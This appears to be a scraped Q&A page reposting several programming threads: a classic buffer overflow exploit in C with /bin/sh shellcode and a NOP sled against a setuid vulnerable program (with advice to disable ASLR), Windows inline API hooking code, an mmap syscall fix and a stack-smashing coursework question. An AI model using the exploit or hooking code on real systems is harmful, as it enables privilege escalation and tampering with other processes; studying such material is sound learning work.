bufferover exploit not working on gcc

bufferover exploit not working on gcc - gdb

I was trying to run this buffer overflow exploit on a vulnerable code vuln.c on gcc (I found this on some tutorial and code is not mine).The shellcode spawns a shell.
exploit.c code
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
This exploit is for the vulnerable code vuln.c:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
But when I run it using ./exploit it gives a segmentation fault instead of opening the shell.I used the commands:
sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit
It shows the result:
(gdb) run
Starting program: /home/a/exploit
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln
Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xbfe3f5a0 -1075579488
edx 0xbfe3dca8 -1075585880
ebx 0xb76e4ff4 -1217507340
esp 0xbfe3dc60 0xbfe3dc60
ebp 0xbffff338 0xbffff338
esi 0x0 0
edi 0x0 0
eip 0xbffff338 0xbffff338
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Please tell me where the problem lies...

Your problem lies in the address you are jumping to....
That exploit does NOT use memory leaks, so it is supposed to be run in a system that does not support ASLR.
Once ASLR is disabled in your system, you have to run the exploit N times until jumping to the right shellcode address...
Function sp() returns the esp on this process, but it may change depending on the backtrace and the process... so you will have to increment a value until reaching the right address.....
Conclusion:
disable ASLR
add an offset getting iterated each time and add it to the esp value before is used
Good luck!!!!

Related

Why does the pin count only three blocks in trace?

I want to list all traces with the blocks they contain, using intel pin. But, as a result, I have a maximum of three blocks in the trace, although there should be more. Tell me, please, why is that so? Thanks in advance!
#include "pin.H"
#include <stdio.h>
using namespace std;
FILE* traceFile;
UINT32 traceNumber = 0;
VOID Trace(TRACE trace, VOID* v)
{
UINT32 blockNumber = 0;
// print trace info
fprintf(traceFile, "Trace [%d]: %p, number of blocks: %d\n", traceNumber, TRACE_Address(trace), TRACE_NumBbl(trace));
for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))
{
// print block info
fprintf(traceFile, "\nBlock [%d]: %p, insts in block: %d\n\n",
blockNumber, BBL_Address(bbl), BBL_NumIns(bbl));
// print all insts in block
for (INS ins = BBL_InsHead(bbl); INS_Valid(ins); ins = INS_Next(ins))
fprintf(traceFile, "%p: %s\n", INS_Address(ins), INS_Disassemble(ins).c_str());
blockNumber++;
}
fprintf(traceFile, "\nTrace [%d] end. %s", traceNumber,
"\n---------------------------------------------------\n\n");
traceNumber++;
}
void Fini(INT32 code, void* v) {
fclose(traceFile);
}
int main(int argc, char* argv[])
{
traceFile = fopen("itrace.out", "w");
PIN_InitSymbols();
PIN_Init(argc, argv);
TRACE_AddInstrumentFunction(Trace, 0);
PIN_AddFiniFunction(Fini, 0);
PIN_StartProgram();
return 0;
}
For example, there are only three blocks here, although I expected to see more:
Trace [4]: 0x7722de32, number of blocks: 3
Block [0]: 0x7722de32, insts in block: 2
0x7722de32: test eax, eax
0x7722de34: jnz 0x77279708
Block [1]: 0x7722de3a, insts in block: 3
0x7722de3a: movzx eax, byte ptr [0x7ffe0384]
0x7722de41: test eax, eax
0x7722de43: jnz 0x7727971d
Block [2]: 0x7722de49, insts in block: 2
0x7722de49: cmp dword ptr [ebp-0x24], ebx
0x7722de4c: jnz 0x7722de5b
Trace [4] end.
---------------------------------------------------
Shouldn't there be 5 blocks here? Apparently, I don’t understand something about blocks and traces. I didn’t see anywhere in the logs that the number of blocks in traces is more than three, for some reason.
in the debugger I see at least 4 blocks
I want to list all traces with the blocks they contain, using intel pin. But, as a result, I have a maximum of three blocks in the trace, although there should be more. Tell me, please, why is that so? Thanks in advance!

Trying to understand a detour (hooking) function

Hi I'm trying to understand a function, it's about Windows API hooking. I'm trying to hook LoadLibraryA to see if any cheats are trying to inject into my game. For that I'm trying to intercept any calls to LoadLibraryA.
I tried to write comments to explain what I think is going on, but I'm unsure about the latter parts
// src = address of LoadLibraryA in kernel32.dll,
// dst = my function prototype of LoadLibraryA
// len = 5, as we allocate a JMP instruction (0xE9)
PVOID Detour(BYTE* src, const BYTE* dst, const int len)
{
BYTE* jmp = (BYTE*)malloc(len + 5); // allocate 10 bytes
DWORD oldProtection; // change protection of 5 bytes starting from LoadLibraryA in kernel32.dll
VirtualProtect(src, len, PAGE_EXECUTE_READWRITE, &oldProtection); // Changes the protection on a region of committed pages in the virtual address space of the calling process.
memcpy(jmp, src, len); // save 5 first bytes of the start of LoadLibraryA in kernel32.dll from src to jmp
jmp += len; // start from byte 6
jmp[0] = 0xE9; // insert jump from byte 6 - 10:
// jmp looks like this currently: [8BFF] = 2 bytes [55] = 1 byte [8BEC] = 2 bytes [0xE9] = 5 bytes
// ??
*(DWORD*)(jmp + 1) = (DWORD)(src + len - jmp) - 5; // ?
// ??
src[0] = 0xE9;
*(DWORD*)(src + 1) = (DWORD)(dst - src) - 5; // ?
// Set the same memory protection as before.
VirtualProtect(src, len, oldProtection, &oldProtection);
// ??
return (jmp - len);
}
Below is the representation before the hook and after.
Before:
After:

The function works fine, just need help in understanding whats going on in the later part > of the function. I'm unsure what happens from here jmp += len;
First thing I notice is your code is doing the detour and the jmp back all in one go, which is different than I usually see people do it.
memcpy(jmp, src, len);
You're copying the stolen bytes to the location of your shellcode
jmp is the address you're jumping to
jmp += len;
length is the number of stolen bytes, or bytes you overwrite which are copied to the area you jmp too, because you must still execute them. So your advancing to the byte directly following your relative jmp in your shellcode
jmp[0] = 0xE9;
You're writing the relative jump instruction
(DWORD)(jmp + 1) = (DWORD)(src + len - jmp) - 5;
jmp + 1 = the address after the jmp instruction where you need to place the relative address
(src + len - jmp) - 5 is the equation required to get the relative address
src[0] = 0xE9;
(DWORD)(src + 1) = (DWORD)(dst - src) - 5;
You're doing the same thing you did inside your shellcode except you're just creating the detour to it in this case.
return (jmp - len);
You're returning the address of the shellcode (this is kinda weird but you have to do this because your code did jmp +=len)

mmap system call returning -14(-EFAULT??)

I am implementing mmap function using system call.(I am implementing mmap manually because of some reasons.)
But I am getting return value -14 (-EFAULT, I checked with GDB) whith this message:
WARN Nar::Mmap: Memory allocation failed.
Here is function:
void *Mmap(void *Address, size_t Length, int Prot, int Flags, int Fd, off_t Offset) {
MmapArgument ma;
ma.Address = (unsigned long)Address;
ma.Length = (unsigned long)Length;
ma.Prot = (unsigned long)Prot;
ma.Flags = (unsigned long)Flags;
ma.Fd = (unsigned long)Fd;
ma.Offset = (unsigned long)Offset;
void *ptr = (void *)CallSystem(SysMmap, (uint64_t)&ma, Unused, Unused, Unused, Unused);
int errCode = (int)ptr;
if(errCode < 0) {
Print("WARN Nar::Mmap: Memory allocation failed.\n");
return NULL;
}
return ptr;
}
I wrote a macro(To use like malloc() function):
#define Malloc(x) Mmap(0, x, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
and I used like this:
Malloc(45);
I looked at man page. I couldn't find about EFAULT on mmap man page, but I found something about EFAULT on mmap2 man page.
EFAULT Problem with getting the data from user space.
I think this means something is wrong with passing struct to system call.
But I believe nothing is wrong with my struct:
struct MmapArgument {
unsigned long Address;
unsigned long Length;
unsigned long Prot;
unsigned long Flags;
unsigned long Fd;
unsigned long Offset;
};
Maybe something is wrong with handing result value?
Openning a file (which doesn't exist) with CallSystem gave me -2(-ENOENT), which is correct.
EDIT: Full source of CallSystem. open, write, close works, but mmap(or old_mmap) not works.
All of the arguments were passed well.
section .text
global CallSystem
CallSystem:
mov rax, rdi ;RAX
mov rbx, rsi ;RBX
mov r10, rdx
mov r11, rcx
mov rcx, r10 ;RCX
mov rdx, r11 ;RDX
mov rsi, r8 ;RSI
mov rdi, r9 ;RDI
int 0x80
mov rdx, 0 ;Upper 64bit
ret ;Return

It is unclear why you are calling mmap via your CallSystem function, I'll assume it is a requirement of your assignment.
The main problem with your code is that you are using int 0x80. This will only work if all the addresses passed to int 0x80 can be expressed in a 32-bit integer. That isn't the case in your code. This line:
MmapArgument ma;
places your structure on the stack. In 64-bit code the stack is at the top end of the addressable address space well beyond what can be represented in a 32-bit address. Usually the bottom of the stack is somewhere in the region of 0x00007FFFFFFFFFFF. int 0x80 only works on the bottom half of the 64-bit registers, so effectively stack based addresses get truncated, resulting in an incorrect address. To make proper 64-bit system calls it is preferable to use the syscall instruction
The 64-bit System V ABI has a section on the general mechanism for the syscall interface in section A.2.1 AMD64 Linux Kernel Conventions. It says:
User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi,
%rsi, %rdx, %r10, %r8 and %r9.
A system-call is done via the syscall instruction. The kernel destroys
registers %rcx and %r11.
We can create a simplified version of your SystemCall code by placing the systemcallnum as the last parameter. As the 7th parameter it will be the first and only value passed on the stack. We can move that value from the stack into RAX to be used as the system call number. The first 6 values are passed in the registers, and with the exception of RCX we can simply keep all the registers as-is. RCX has to be moved to R10 because the 4th parameter differs between a normal function call and the Linux kernel SYSCALL convention.
Some simplified code for demonstration purposes could look like:
global CallSystem
section .text
CallSystem:
mov rax, [rsp+8] ; CallSystem 7th arg is 1st val passed on stack
mov r10, rcx ; 4th argument passed to syscall in r10
; RDI, RSI, RDX, R8, R9 are passed straight through
; to the sycall because they match the inputs to CallSystem
syscall
ret
The C++ could look like:
#include <stdlib.h>
#include <sys/mman.h>
#include <stdint.h>
#include <iostream>
using namespace std;
extern "C" uint64_t CallSystem (uint64_t arg1, uint64_t arg2,
uint64_t arg3, uint64_t arg4,
uint64_t arg5, uint64_t arg6,
uint64_t syscallnum);
int main()
{
uint64_t addr;
addr = CallSystem(static_cast<uint64_t>(NULL), 45,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0, 0x9);
cout << reinterpret_cast<void *>(addr) << endl;
}
In the case of mmap the syscall is 0x09. That can be found in the file asm/unistd_64.h:
#define __NR_mmap 9
The rest of the arguments are typical of the newer form of mmap. From the manpage:
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
If your run strace on your executable (ie strace ./a.out) you should find a line that looks like this if it works:
mmap(NULL, 45, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed8e7cc000
The return value will differ, but it should match what the demonstration program displays.
You should be able to adapt this code to what you are doing. This should at least be a reasonable starting point.
If you want to pass the syscallnum as the first parameter to CallSystem you will have to modify the assembly code to move all the registers so that they align properly between the function call convention and syscall conventions. I leave that as a simple exercise to the reader. Doing so will yield a lot less efficient code.

Why are there 8 bytes between the end of a buffer and the saved frame pointer?

I am doing a stack-smashing exercise for coursework, and I have already completed the assignment, but there is one aspect that I do not understand.
Here is the target program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int bar(char *arg, char *out)
{
strcpy(out, arg);
return 0;
}
void foo(char *argv[])
{
char buf[256];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target1: argc != 2\n");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
Here are the commands used to compile it, on an x86 virtual machine running Ubuntu 12.04, with ASLR disabled.
gcc -ggdb -m32 -g -std=c99 -D_GNU_SOURCE -fno-stack-protector -m32 target1.c -o target1
execstack -s target1
When I look at the memory of this program on the stack, I see that buf has the address 0xbffffc40. Moreover, the saved frame pointer is stored at 0xbffffd48, and the return address is stored at 0xbffffd4c.
These specific addresses are not relevant, but I observe that even though buf only has length 256, the distance 0xbffffd48 - 0xbffffc40 = 264. Symbolically, this computation is $fp - buf.
Why are there 8 extra bytes between the end of buf and the stored frame pointer on the stack?
Here is some disassembly of the function foo. I have already examined it, but I did not see any obvious usage of that memory region, unless it was implicit (ie a side effect of some instruction).
0x080484ab <+0>: push %ebp
0x080484ac <+1>: mov %esp,%ebp
0x080484ae <+3>: sub $0x118,%esp
0x080484b4 <+9>: mov 0x8(%ebp),%eax
0x080484b7 <+12>: add $0x4,%eax
0x080484ba <+15>: mov (%eax),%eax
0x080484bc <+17>: lea -0x108(%ebp),%edx
0x080484c2 <+23>: mov %edx,0x4(%esp)
0x080484c6 <+27>: mov %eax,(%esp)
0x080484c9 <+30>: call 0x804848c <bar>
0x080484ce <+35>: leave
0x080484cf <+36>: ret

Basile Starynkevitch gets the prize for mentioning alignment.
It turns out that gcc 4.7.2 defaults to aligning the frame boundary to a 4-word boundary. On 32-bit emulated hardware, that is 16 bytes. Since the saved frame pointer and the saved instruction pointer together only take up 8 bytes, the compiler put in another 8 bytes after the end of buf to align the top of the stack frame to a 16 byte boundary.
Using the following additional compiler flag, the 8 bytes disappears, because the 8 bytes is enough to align to a 2-word boundary.
-mpreferred-stack-boundary=2

Calculating offset for hotpatching/inline function hooking

From http://lastfrag.com/hotpatching-and-inline-hooking-explained/,
Q1) Does code proceed from high memory to low memory or vice versa?
Q2) More importantly, during the calculation of the replacement offset, why is it that you have to minus the function preamble? Is it because the offset starts from the end of the instruction and not the beginning?
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
Full Code:
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
DWORD OriginalAddress = (DWORD)GetProcAddress(hModule, API);
DWORD ReplacementAddress = (DWORD)Function;
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
LPBYTE pOriginalAddress = (LPBYTE)OriginalAddress;
LPBYTE pReplacementAddressOffset = (LPBYTE)(&ReplacementAddressOffset);
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect((PVOID)OriginalAddress, 5, NewProtect, &OldProtect);
for (int i = 0; i < 5; i++)
Store[i] = pOriginalAddress[i];
pOriginalAddress[0] = (BYTE)0xE9;
for (int i = 0; i < 4; i++)
pOriginalAddress[i + 1] = pReplacementAddressOffset[i];
VirtualProtect((PVOID)OriginalAddress, 5, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, NULL);
FreeLibrary(hModule);
}
Q3) In this code, the relative address of a jmp instruction is being replaced; relAddrSet is a pointer to the original destination; to is a pointer to the new destination. I don't understand the calculation of the to address, why is it that you have to add the original destination to the functionForHook + opcodeOffset?
DWORD *relAddrSet = (DWORD *)(currentOpcode + 1);
DWORD_PTR to = (*relAddrSet) + ((DWORD_PTR)functionForHook + opcodeOffset);
*relAddrSet = (DWORD)(to - ((DWORD_PTR)originalFunction + opcodeOffset));

Yes the relative address is the the offset after the instructions, that's why you have to substract 5.
But, in my opinion, you should just forget the idea of the relative jump and try absolute jump.
Why ? Because it is a lot easier and x86-64 compatible (relative jumps are limited to +/-2GB).
The absolute jump is (x64) :
48 b8 ef cd ab 89 67 45 23 01 mov rax, 0x0123456789abcdef
ff e0 jmp rax
And for x86 :
b8 67 45 23 01 mov eax, 0x01234567
ff e0 jmp eax
Here is the modified code (the loader is now 7 bytes instead of 5):
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
DWORD OriginalAddress = (DWORD)GetProcAddress(hModule, API);
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect((PVOID)OriginalAddress, 7, NewProtect, &OldProtect);
memcpy(Store, OriginalAddress, 7);
memcpy(OriginalAddress, "\xb8\x00\x00\x00\x00\xff\xe0", 7);
memcpy(OriginalAddress+1, &ReplacementAddress, sizeof(void*));
VirtualProtect((PVOID)OriginalAddress, 7, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, NULL);
FreeLibrary(hModule);
}
The code is the same for x64 but you have to add 2 nops (90) at the beginning or the end in order match the size of the following instructions, so the loader is "\x48\xb8<8-bytes addr>\xff\xe0\x90\x90" (14 bytes)

Q1) The program runs from lower to highest addresses (i.e. the program counter gets increased by the size of each instruction, unless in case of jumps, calls or ret). But I am probably missing the point of the question.
Q2) Yes, on x86 the jumps are executed after the program counter has been increased by the size of the jump instruction (5 bytes); when the CPU adds the jump offset to the program counter to calculate the target address, the program counter has already been increased of 5.
Q3) This code is quite weird, but it may work. I suppose that *relAddrset initially contains a jump offset to originalFunction (i.e. *relAddSet==originalFunction-relativeOffset). If this is true, the final result is that *reladdrSet contains a jump offset to functionFoHook. Indeed the last instruction becomes:
*relAddrSet=(originalFunction-relativeOffset)+functionForHook-originalFunction
== functionForHook-relativeOffset

Yes, code runs "forward" if I understand this question correctly. One instruction is executed after another if it is not branching.
An instruction that does a relative jump (JMP, CALL) does the jump relative to the start of the next instruction. That's why you have to subtract the length of the instruction (here: 5) from the difference.
I can't answer your third question. Please give some context and what the code is supposed to do.

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js

bufferover exploit not working on gcc - gdb

Related

Why does the pin count only three blocks in trace?

Trying to understand a detour (hooking) function

mmap system call returning -14(-EFAULT??)

Why are there 8 bytes between the end of a buffer and the saved frame pointer?

Calculating offset for hotpatching/inline function hooking

Categories

Resources